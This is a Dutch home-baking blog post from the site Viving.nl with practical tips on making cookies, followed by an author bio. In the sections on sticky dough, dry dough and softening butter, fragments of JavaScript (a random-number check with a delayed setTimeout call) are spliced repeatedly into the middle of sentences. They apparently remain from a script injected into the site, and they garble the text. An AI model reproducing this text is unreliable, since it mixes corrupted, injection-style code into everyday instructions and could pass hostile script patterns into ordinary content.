Koekjes bakken? Lees dan deze handige tips!

De eerste keer koekjes bakken was net als het bakken van speculaas niet echt een succes. Ik dacht nog; ‘Dat kan niet moeilijk zijn.’ Toch moet je goed opletten, want voordat je het weet krijg je je koekjes niet uit de vormpjes of zijn je ze veel te donker. Lees deze tips dus een keer rustig door voordat je begint of als je net als ik geen ervaren bakker bent. Heb jij ook een goede tip? Deel deze dan via het contactformulier, als reactie op dit bericht of op mijn Facebook pagina.

Plakkerig Deeg?

Is je deeg plakkerig? Voeg dan wat bloem dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe aan het deeg. Doe het wel geleidelijk, als je te veel boem dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevoegt wordt het deeg weer te droog. Je zult zien dat het deeg een andere structuur krijgt.

Mijn deeg is te droog…

Als je deeg te droog is of je hebt te veel bloem dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegevoegd, kun je wat boter dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevoegen. Ook door het deeg goed te kneden met je handen kun je het deeg weer iets soepeler krijgen.

Boter snel zacht maken?

Wil je snel aan de slag en kun je niet wachten dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot je boter zacht is? Laat een laagje heeft water in de gootsteen lopen en snijd de boter in kleine plakjes in de kom. Je zult zien dat de boter snel zacht wordt. Als de boter ligt begint te smelten kun je de kom weer uit het water halen en met je deeg beginnen.

Koekjesdeeg afkoelen

Voordat je gaat bakken is het verstandig het deeg ten minste 30 minuten goed af te laten koelen in de koelkast. Dit voorkomst dat je koekjes gaan uitlopen in de oven. Ook voor de knapperigheid van het koekje is het verstandig om echt even geduld te hebben.

Gelijkmatige Koekjes

Zorg voor mooie gelijkmatig, ongeveer even dikke koekjes in dezelfde grootte. Als je verschillende grootte koekjes op dezelfde bakplaat legt dan zul je zien dat het ene koekje net even wat langer nodig heeft dan de ander en voor je het weet is de helft aangebrand. Voor die paar minuten die koekjes in de oven moeten is het de moeite waard om in meerdere etappes te bakken.

Je kunt hiervoor overigens ook een hulpmiddel gebruiken zoals twee linialen of pollepels waar je het deeg tussen rolt.

Deeg blijft plakken aan deegroller

In het artikel over speculaas bakken, had ik al een paar tips gegeven over hoe je er voor kunt zorgen dat je deeg niet aan je deegroller blijft plakken. Leg het deeg tussen wat huishoudfolie of bakpapier en rollen maar!

Ik krijg de koekjes niet uit de vormpjes

Je wil natuurlijk een perfect koekje dat zonder kleerscheuren uit het vormpje komt. Bestrijk je vormpjes met wat bloem voordat je de koekjes gaat steken. Geloof me; het werkt!

Wanneer zijn ze gaar?

Raar maar waar, koekjes komen zacht uit de oven. Je hebt misschien de neiging om ze direct op te pakken, maar doe dit vooral niet. Laat ze vooral rustig afkoelen voordat je ze van de bakplaat afhaalt. Je kunt controleren of ze gaar zijn als de randen mooi goudbruin zijn. Het heeft geen zin om met een satéprikker in de koekjes te prikken. Hier maak je ze eerder een stuk minder mooi van.

Koekjes bewaren?

Als je de verleiding kunt weerstaan om niet gelijk alle koekjes op te eten of uit te delen hierbij wat tips om ze lang te bewaren. Bewaar ze vooral lucht dicht in een afgesloten pot of koektrommel. Je kunt ze hierdoor prima 4-6 weken bewaren. Zelf vind ik koekjes wel het allerlekkerst als ze echt kakelvers zijn.

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Koekjes bakken? Lees dan deze handige tips!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.